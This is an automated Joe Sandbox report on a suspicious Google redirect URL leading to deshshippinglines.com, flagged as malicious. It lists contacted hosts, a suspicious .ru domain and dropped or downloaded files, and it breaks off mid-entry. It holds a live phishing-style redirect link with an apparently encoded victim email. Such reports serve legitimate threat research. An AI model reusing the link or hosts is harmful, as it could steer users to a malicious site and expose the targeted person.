                                                                                                                                  code.jquery.comUnited States
                                                                                                                                  54113FASTLYUSfalse
                                                                                                                                  18.204.152.18
                                                                                                                                  endpoint.prod.us-east-1.forester.a2z.comUnited States
                                                                                                                                  14618AMAZON-AESUSfalse
                                                                                                                                  142.250.186.132
                                                                                                                                  unknownUnited States
                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                  151.101.194.137
                                                                                                                                  unknownUnited States
                                                                                                                                  54113FASTLYUSfalse
                                                                                                                                  35.190.80.1
                                                                                                                                  a.nel.cloudflare.comUnited States
                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                  104.17.24.14
                                                                                                                                  cdnjs.cloudflare.comUnited States
                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                  216.58.212.131
                                                                                                                                  www.google.pnUnited States
                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                  99.86.8.42
                                                                                                                                  d3ag4hukkh62yn.cloudfront.netUnited States
                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                  104.18.95.41
                                                                                                                                  unknownUnited States
                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                  54.88.216.125
                                                                                                                                  unknownUnited States
                                                                                                                                  14618AMAZON-AESUSfalse
                                                                                                                                  18.66.143.128
                                                                                                                                  unknownUnited States
                                                                                                                                  3MIT-GATEWAYSUSfalse
                                                                                                                                  104.21.93.228
                                                                                                                                  y3.ackeoneye.comUnited States
                                                                                                                                  13335CLOUDFLARENETUStrue
                                                                                                                                  239.255.255.250
                                                                                                                                  unknownReserved
                                                                                                                                  unknownunknownfalse
                                                                                                                                  142.250.185.196
                                                                                                                                  www.google.comUnited States
                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                  199.168.185.232
                                                                                                                                  deshshippinglines.comUnited States
                                                                                                                                  33182DIMENOCUSfalse
                                                                                                                                  188.114.97.3
                                                                                                                                  v27bncxfmlahb4cndraeyexerpo6dunjyclmvgbp4g8o6oqsbi17rop.adlijari.ruEuropean Union
                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                  IP
                                                                                                                                  192.168.2.6
                                                                                                                                  192.168.2.5
                                                                                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                                                                                  Analysis ID:1600457
                                                                                                                                  Start date and time:2025-01-27 15:43:51 +01:00
                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                  Overall analysis duration:0h 3m 5s
                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                  Report type:full
                                                                                                                                  Cookbook file name:browseurl.jbs
                                                                                                                                  Sample URL:https://www.google.pn/url?sa==a6bzuik1ma3dlpHqxRTACXaYHYI&rct=s7fFjO3jMe8ieQpeNofXnE7ZxaxKrm87scW4CKSzwd4Eiunz5jJ6j2AdElmCOMFCyq&sa=t&url=amp/s/deshshippinglines.com/demo/mode/IJulKkbhDRoCeYksSX62whnucNHhPavrd66HpTU/Z29ya2EuamltZW5lekBkZXZvbC5lcw==
                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                  Number of analysed new started processes analysed:7
                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                  Technologies:
                                                                                                                                  • EGA enabled
                                                                                                                                  • AMSI enabled
                                                                                                                                  Analysis Mode:default
                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                  Detection:MAL
                                                                                                                                  Classification:mal52.win@19/92@40/21
                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                  • Excluded IPs from analysis (whitelisted): 142.250.186.99, 216.58.206.78, 74.125.133.84, 172.217.16.206, 142.250.74.206, 199.232.214.172, 2.23.77.188, 142.250.186.46, 142.250.184.238, 142.250.185.170, 142.250.185.234, 142.250.185.106, 216.58.206.42, 142.250.186.170, 216.58.206.74, 142.250.186.106, 172.217.18.10, 142.250.186.42, 142.250.185.138, 142.250.184.202, 172.217.16.138, 142.250.74.202, 142.250.185.202, 172.217.16.202, 142.250.181.234, 142.250.185.174, 142.250.185.142, 142.250.185.78, 142.250.185.163, 199.232.210.172, 184.28.90.27, 4.245.163.56, 13.107.253.45
                                                                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                  • VT rate limit hit for: https://www.google.pn/url?sa==a6bzuik1ma3dlpHqxRTACXaYHYI&amp;rct=s7fFjO3jMe8ieQpeNofXnE7ZxaxKrm87scW4CKSzwd4Eiunz5jJ6j2AdElmCOMFCyq&amp;sa=t&amp;url=amp/s/deshshippinglines.com/demo/mode/IJulKkbhDRoCeYksSX62whnucNHhPavrd66HpTU/Z29ya2EuamltZW5lekBkZXZvbC5lcw==
                                                                                                                                  No simulations
                                                                                                                                  No context
                                                                                                                                  No context
                                                                                                                                  No context
                                                                                                                                  No context
                                                                                                                                  No context
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 27 13:44:47 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2677
                                                                                                                                  Entropy (8bit):3.9793503257351195
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:8NdjoTDs8zHnidAKZdA19ehwiZUklqehVy+3:80nN2y
                                                                                                                                  MD5:B299772183676EFAD55059E5F49C17E0
                                                                                                                                  SHA1:E073DB9B4D2BC7C65BD937CD508F0795388B0AA5
                                                                                                                                  SHA-256:E2400DF409673E9AC0D89175573CA38C92C29E524433BC3D3CD77DA8D5B8AE58
                                                                                                                                  SHA-512:576BABEA591B739549745FAF2512EF9E9A718CEE6E5E6283549925972F182FF2DC73EFF85D103B5F6F6F4EFEC81617A280ACDC081C40DFEC9C5667ED332F5C84
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:L..................F.@.. ...$+.,....8.$..p..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I;Z.u....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V;Z.u....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V;Z.u....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V;Z.u..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V;Z.u...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............L0......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 27 13:44:47 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2679
                                                                                                                                  Entropy (8bit):3.9934809844769075
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:8VdjoTDs8zHnidAKZdA1weh/iZUkAQkqehmy+2:8snn9Qry
                                                                                                                                  MD5:5D0E7C4B699B2FEBCC0FF870B38C3877
                                                                                                                                  SHA1:38218E6E3427DD4BA1AE6D19C46A2E2D67657926
                                                                                                                                  SHA-256:D4A0DBB93E9377E7328B427DF7A97DEE3DBDC36DB12FE076B793FA75B098EDAF
                                                                                                                                  SHA-512:36DE41ADD0CBFB9CAD52BBC7E5BE1A11140C63E23BDBA9CB9FBA124931A4A22B65DD706208088EE4E8F63993321931D996209D461020F0A031C3EFF92E57F0E1
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:L..................F.@.. ...$+.,....p....p..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I;Z.u....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V;Z.u....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V;Z.u....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V;Z.u..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V;Z.u...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............L0......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2693
                                                                                                                                  Entropy (8bit):4.008259992509064
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:8x1djoTDs8sHnidAKZdA14tseh7sFiZUkmgqeh7sMy+BX:8xMnGnyy
                                                                                                                                  MD5:9780D627F752F6D2922AA0BD1212CB01
                                                                                                                                  SHA1:1BEAA5951830F30B866EBE889F9E1A8DD647C260
                                                                                                                                  SHA-256:C26433D5384B2B0F788AED24A03E8A99F741E162E577C222BE4A8A259F8FF189
                                                                                                                                  SHA-512:8C3299333B3C3956D43440B8A0E31967473938D4F630B0824B017F428398A60640CF371C9E2731BDE6F3581A70B7AF33429612FD014B7DE387831B8AD5270EE5
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I;Z.u....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V;Z.u....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V;Z.u....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V;Z.u..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............L0......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 27 13:44:47 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2681
                                                                                                                                  Entropy (8bit):3.9939726031222533
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:8idjoTDs8zHnidAKZdA1vehDiZUkwqeh6y+R:8NnEUy
                                                                                                                                  MD5:A4F1CEAD17841281A387D47180241F51
                                                                                                                                  SHA1:9428B28FE372AECACE596DB14FF79ADB9E2E75A7
                                                                                                                                  SHA-256:E4D1B494BDF4951B5B48D9956229607A8724B5D1A62E75E1F80F6E8BA0438343
                                                                                                                                  SHA-512:E860D0E62575317DBB4CD369BBE02300FA7B8790657B088891B1D61D99A3C0652BB1CA536AE5E2CE767240D8CD5393A96BA7D968ACDE315E44D0A97AFE62010A
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:L..................F.@.. ...$+.,.........p..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I;Z.u....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V;Z.u....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V;Z.u....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V;Z.u..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V;Z.u...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............L0......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 27 13:44:47 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2681
                                                                                                                                  Entropy (8bit):3.981158995120626
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:8NdjoTDs8zHnidAKZdA1hehBiZUk1W1qeh4y+C:80nE9Yy
                                                                                                                                  MD5:E665B7ECFD738EF786FD522A773DEEAF
                                                                                                                                  SHA1:5CEAD83F0A38AABB445F430B8C366699F47F7FED
                                                                                                                                  SHA-256:DA2491DE6EDB3C505FF252B281027FCFEBCECB09948525E2FA4F4B5B6633CA24
                                                                                                                                  SHA-512:BF534DEF345CE4F07EA86FD998D1A9F1D9024710784B74B08DE8001664F911A7C80563EBDFF19BB2B4E6E5D7B781BB239A286495448075AF14EA29440D571A4C
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:L..................F.@.. ...$+.,...... ..p..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I;Z.u....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V;Z.u....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V;Z.u....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V;Z.u..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V;Z.u...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............L0......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 27 13:44:47 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2683
                                                                                                                                  Entropy (8bit):3.9936807240577705
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:8VdjoTDs8zHnidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbyy+yT+:8snqT/TbxWOvTbyy7T
                                                                                                                                  MD5:25054AB946D1284DF300890045EAEA6B
                                                                                                                                  SHA1:10003F1CFE54560D42F8D156F825626A56D25F07
                                                                                                                                  SHA-256:7A412482080A554B37D4481CDF7A0A32AAA53B08825BF45C0048E553B25B5614
                                                                                                                                  SHA-512:A34002E7C7F11FD4F199B6A80A43B963FB1BE50D694B77C48782609DAE2F06E32447E5FD992BF34C09CBB8BA441335DA6117224135072CC68F777C72E99D1182
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:L..................F.@.. ...$+.,.........p..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I;Z.u....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V;Z.u....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V;Z.u....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V;Z.u..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V;Z.u...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............L0......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                  Category:downloaded
                                                                                                                                  Size (bytes):43
                                                                                                                                  Entropy (8bit):2.9889835948335506
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                  MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                  SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                  SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                  SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  URL:https://fls-na.amazon.com/1/oc-csi/1/OP/requestId=FX8PKVREDAYJTT4H6MBJ&js=1
                                                                                                                                  Preview:GIF89a.............!.......,...........L..;
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                  Category:downloaded
                                                                                                                                  Size (bytes):315
                                                                                                                                  Entropy (8bit):5.0572271090563765
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                                                                                                  MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                                                                                  SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                                                                                                  SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                                                                                  SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  URL:https://deshshippinglines.com/favicon.ico
                                                                                                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 200x70, components 1
                                                                                                                                  Category:downloaded
                                                                                                                                  Size (bytes):5793
                                                                                                                                  Entropy (8bit):7.915289810514246
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:RJcB0MERpjoZRy4qDVirtz5OtZZx3PJW0GTfY2l6k6+oaJhwZY5pcUaV2:LcBBERJsy4qpirtU33cRgkVoaTwOYUac
                                                                                                                                  MD5:EFAA66A847D623D8030DB53F495A14A5
                                                                                                                                  SHA1:22DDFAE7BA02A6BA4B018010C6845AA12452805B
                                                                                                                                  SHA-256:7CDD30BD9D2A602FB3E8893FFD67563423B2404D8061E314381E5898810443E3
                                                                                                                                  SHA-512:B6FD638DCB57B3BA4DCD86FBA2D81159789C936B26CAAD365EFC599A5C52B461290B7D57D11D8C1BC9D7B5C0F8668675071C72475AD3891D7059E02E057C6556
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  URL:https://images-na.ssl-images-amazon.com/captcha/rhnrlggh/Captcha_fcrspsdsms.jpg
                                                                                                                                  Preview:......JFIF.....H.H.....C.......................................................................F...........................................................................!".1$.#2AB........?....s....r..c%....p.y%#..^.....r...O...........r.p..1...b...rX"...LH....,.....)$....!Xh@F.<....p.g...a.9;..o&{......F..zfF..$'.m.^.f..Y.l.%...4..#VmF.Om.G..............w.>I..a..6.D.....51 ....=Yb:...."V.F......$.....[...W......3...=..C.l......[. .v.x..+.G..'.*Dx...X.......A.....c.yC..OJ:9.{{-..4.[..lr.'..l..D.FJ.U;...j..0.CG.I..C.....l.L.q.<~..M... ....m `.SX<.M...m.@.U.<..2c..{q..'.=C.x. ....K..T...6.tKv..T..\..v.u....K..<.d"J(U...+.J\.p.C=...ek.....=..vO.....k]....S....G..]6zGe]k.wG../..F.h...qf0KL...0.\..g...>c.w.2.j...q.."_p....>4..^.,.?.....,...?j...u.W....=.sw._0-ga.Ei.C:.w...\.l.....t..75 .a%.5d..{2..1I.F.v....P.XR..V...G..........CfnB......\*..E.#..,.!&F......`d...3../6.z.6.ku...B.q...6.hNT..j...!8..g.Jq..8.9....]7...w^....p]...X.Uj=.I..H6d..T..{_.......B.
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 200x70, components 1
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):5793
                                                                                                                                  Entropy (8bit):7.915289810514246
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:RJcB0MERpjoZRy4qDVirtz5OtZZx3PJW0GTfY2l6k6+oaJhwZY5pcUaV2:LcBBERJsy4qpirtU33cRgkVoaTwOYUac
                                                                                                                                  MD5:EFAA66A847D623D8030DB53F495A14A5
                                                                                                                                  SHA1:22DDFAE7BA02A6BA4B018010C6845AA12452805B
                                                                                                                                  SHA-256:7CDD30BD9D2A602FB3E8893FFD67563423B2404D8061E314381E5898810443E3
                                                                                                                                  SHA-512:B6FD638DCB57B3BA4DCD86FBA2D81159789C936B26CAAD365EFC599A5C52B461290B7D57D11D8C1BC9D7B5C0F8668675071C72475AD3891D7059E02E057C6556
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:......JFIF.....H.H.....C.......................................................................F...........................................................................!".1$.#2AB........?....s....r..c%....p.y%#..^.....r...O...........r.p..1...b...rX"...LH....,.....)$....!Xh@F.<....p.g...a.9;..o&{......F..zfF..$'.m.^.f..Y.l.%...4..#VmF.Om.G..............w.>I..a..6.D.....51 ....=Yb:...."V.F......$.....[...W......3...=..C.l......[. .v.x..+.G..'.*Dx...X.......A.....c.yC..OJ:9.{{-..4.[..lr.'..l..D.FJ.U;...j..0.CG.I..C.....l.L.q.<~..M... ....m `.SX<.M...m.@.U.<..2c..{q..'.=C.x. ....K..T...6.tKv..T..\..v.u....K..<.d"J(U...+.J\.p.C=...ek.....=..vO.....k]....S....G..]6zGe]k.wG../..F.h...qf0KL...0.\..g...>c.w.2.j...q.."_p....>4..^.,.?.....,...?j...u.W....=.sw._0-ga.Ei.C:.w...\.l.....t..75 .a%.5d..{2..1I.F.v....P.XR..V...G..........CfnB......\*..E.#..,.!&F......`d...3../6.z.6.ku...B.q...6.hNT..j...!8..g.Jq..8.9....]7...w^....p]...X.Uj=.I..H6d..T..{_.......B.
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:ASCII text, with very long lines (65447)
                                                                                                                                  Category:downloaded
                                                                                                                                  Size (bytes):89501
                                                                                                                                  Entropy (8bit):5.289893677458563
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
